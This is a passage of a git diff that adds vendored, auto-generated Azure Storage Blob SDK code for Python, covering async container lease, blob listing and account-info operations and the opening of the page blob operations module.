+ :type proposed_lease_id: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "acquire". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "acquire") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_acquire_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + timeout=timeout, + duration=duration, + proposed_lease_id=proposed_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.acquire_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + acquire_lease.metadata = 
{'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def release_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "release". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "release") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_release_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.release_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', 
response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + release_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def renew_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "renew". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "renew") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_renew_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.renew_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + renew_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def break_lease( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + break_period: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param break_period: For a break operation, proposed duration the lease should continue before + it is broken, in seconds, between 0 and 60. This break period is only used if it is shorter + than the time remaining on the lease. 
If longer, the time remaining on the lease is used. A new + lease will not be available before the break period has expired, but the lease may be held for + longer than the break period. If this header does not appear with a break operation, a + fixed-duration lease breaks after the remaining lease period elapses, and an infinite lease + breaks immediately. Default value is None. + :type break_period: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "break". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "break") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_break_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + timeout=timeout, + break_period=break_period, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.break_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-time']=self._deserialize('int', response.headers.get('x-ms-lease-time')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + 
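+        # Illustrative sketch (not generated code): a break is normally issued
+        # through the public azure.storage.blob.aio API, which calls this
+        # operation. `container_client` is assumed to be an authenticated
+        # ContainerClient:
+        #
+        #     lease = await container_client.acquire_lease(lease_duration=15)
+        #     # Give writers up to 5 seconds before the break takes effect.
+        #     await lease.break_lease(lease_break_period=5)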
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + break_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def change_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + proposed_lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. + :type proposed_lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "change". Note that + overriding this default value may result in unsupported behavior. 
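+        For example, rotating the lease ID through the public API (an
+        illustrative sketch, not generated code; ``lease`` is assumed to be an
+        active ``azure.storage.blob.aio.BlobLeaseClient`` held on the
+        container)::
+
+            import uuid
+            await lease.change(proposed_lease_id=str(uuid.uuid4()))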
+ :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "change") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_change_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + proposed_lease_id=proposed_lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.change_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + change_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def list_blob_flat_segment( + self, + prefix: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + include: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.ListBlobsFlatSegmentResponse": + """[Update] The List Blobs operation returns a list of the blobs under the specified container. + + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. 
The operation returns the NextMarker value within the
+        response body if the listing operation did not return all blobs remaining to be listed
+        with the current page. The NextMarker value can be used as the value for the marker parameter
+        in a subsequent call to request the next page of list items. The marker value is opaque to the
+        client. Default value is None.
+        :type marker: str
+        :param maxresults: Specifies the maximum number of blobs to return. If the request does
+        not specify maxresults, or specifies a value greater than 5000, the server will return up to
+        5000 items. Note that if the listing operation crosses a partition boundary, then the service
+        will return a continuation token for retrieving the remainder of the results. For this reason,
+        it is possible that the service will return fewer results than specified by maxresults, or than
+        the default of 5000. Default value is None.
+        :type maxresults: int
+        :param include: Include this parameter to specify one or more datasets to include in the
+        response. Default value is None.
+        :type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem]
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+        :code:`Setting
+        Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
+        limit that is recorded in the analytics logs when storage analytics logging is enabled. Default
+        value is None.
+        :type request_id_parameter: str
+        :keyword restype: restype. Default value is "container". Note that overriding this default
+        value may result in unsupported behavior.
+        :paramtype restype: str
+        :keyword comp: comp. Default value is "list". Note that overriding this default value may
+        result in unsupported behavior.
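+        For example, a flat listing is normally requested through the public
+        API, which pages over this operation (an illustrative sketch, not
+        generated code; ``container_client`` is assumed to be an authenticated
+        ``azure.storage.blob.aio.ContainerClient``)::
+
+            async for blob in container_client.list_blobs(name_starts_with="logs/"):
+                print(blob.name, blob.size)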
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListBlobsFlatSegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListBlobsFlatSegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListBlobsFlatSegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_blob_flat_segment_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_blob_flat_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('ListBlobsFlatSegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_blob_flat_segment.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def list_blob_hierarchy_segment( + self, + delimiter: str, + prefix: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + include: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.ListBlobsHierarchySegmentResponse": + """[Update] The List Blobs operation returns a list of the blobs under the specified container. + + :param delimiter: When the request includes this parameter, the operation returns a BlobPrefix + element in the response body that acts as a placeholder for all blobs whose names begin with + the same substring up to the appearance of the delimiter character. The delimiter may be a + single character or a string. + :type delimiter: str + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. 
The operation returns the NextMarker value within the
+        response body if the listing operation did not return all blobs remaining to be listed
+        with the current page. The NextMarker value can be used as the value for the marker parameter
+        in a subsequent call to request the next page of list items. The marker value is opaque to the
+        client. Default value is None.
+        :type marker: str
+        :param maxresults: Specifies the maximum number of blobs to return. If the request does
+        not specify maxresults, or specifies a value greater than 5000, the server will return up to
+        5000 items. Note that if the listing operation crosses a partition boundary, then the service
+        will return a continuation token for retrieving the remainder of the results. For this reason,
+        it is possible that the service will return fewer results than specified by maxresults, or than
+        the default of 5000. Default value is None.
+        :type maxresults: int
+        :param include: Include this parameter to specify one or more datasets to include in the
+        response. Default value is None.
+        :type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem]
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+        :code:`Setting
+        Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
+        limit that is recorded in the analytics logs when storage analytics logging is enabled. Default
+        value is None.
+        :type request_id_parameter: str
+        :keyword restype: restype. Default value is "container". Note that overriding this default
+        value may result in unsupported behavior.
+        :paramtype restype: str
+        :keyword comp: comp. Default value is "list". Note that overriding this default value may
+        result in unsupported behavior.
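+        For example, a hierarchical listing through the public API (an
+        illustrative sketch, not generated code; ``container_client`` is
+        assumed to be an authenticated
+        ``azure.storage.blob.aio.ContainerClient``)::
+
+            async for item in container_client.walk_blobs(delimiter="/"):
+                print(item.name)  # BlobPrefix entries mark "virtual directories"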
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListBlobsHierarchySegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListBlobsHierarchySegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListBlobsHierarchySegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_blob_hierarchy_segment_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + delimiter=delimiter, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_blob_hierarchy_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('ListBlobsHierarchySegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_blob_hierarchy_segment.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs: Any + ) -> None: + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}/{containerName}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_page_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_page_blob_operations.py new file mode 100644 index 0000000..5765ca0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_page_blob_operations.py @@ -0,0 +1,1397 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. 
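+# Illustrative usage sketch (editorial, not part of the generated file): the
+# container operations above are normally reached through the public client,
+# e.g. fetching the account SKU and kind; `conn_str` is an assumed
+# connection string:
+#
+#     from azure.storage.blob.aio import ContainerClient
+#
+#     async def show_account_info(conn_str: str) -> None:
+#         async with ContainerClient.from_connection_string(
+#                 conn_str, container_name="data") as container:
+#             info = await container.get_account_information()
+#             print(info["sku_name"], info["account_kind"])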
+# -------------------------------------------------------------------------- +import datetime +from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... import models as _models +from ..._vendor import _convert_request +from ...operations._page_blob_operations import build_clear_pages_request, build_copy_incremental_request, build_create_request, build_get_page_ranges_diff_request, build_get_page_ranges_request, build_resize_request, build_update_sequence_number_request, build_upload_pages_from_url_request, build_upload_pages_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class PageBlobOperations: + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`page_blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def create( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + blob_content_length: int, + timeout: Optional[int] = None, + tier: Optional[Union[str, "_models.PremiumPageBlobAccessTier"]] = None, + metadata: Optional[Dict[str, str]] = None, + blob_sequence_number: Optional[int] = 0, + request_id_parameter: Optional[str] = None, + blob_tags_string: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Create operation creates a new page blob. + + :param content_length: The length of the request. + :type content_length: long + :param 